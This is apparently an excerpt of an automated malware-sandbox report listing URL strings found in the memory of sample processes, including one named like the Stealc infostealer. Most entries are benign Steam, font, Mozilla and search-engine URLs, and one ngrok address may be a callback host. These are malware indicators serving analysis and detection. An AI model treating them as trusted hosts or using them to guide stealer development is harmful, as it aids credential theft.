Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000000.2596749853.0000000000E79000.00000002.00000001.01000000.0000000E.sdmp, EcoCraft.scr, 0000001C.00000000.2676298828.00000000007E9000.00000002.00000001.01000000.00000011.sdmp, EcoCraft.scr, 00000020.00000002.2778743195.00000000007E9000.00000002.00000001.01000000.00000011.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp, splwow64[1].exe.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: shop.exe, 00000032.00000003.3571108803.0000000001640000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3237340411.0000000001631000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cH
Source: stealc_default2.exe, stealc_default2.exe, 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.6.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: stealc_default2.exe, 00000006.00000002.2674136604.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785879104.000000000123B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3102164882.0000000003981000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ep
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.epnacl
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=uDUW
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=2UcHUv7TDL_s&amp
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785879104.000000000123B000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3102164882.0000000003981000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
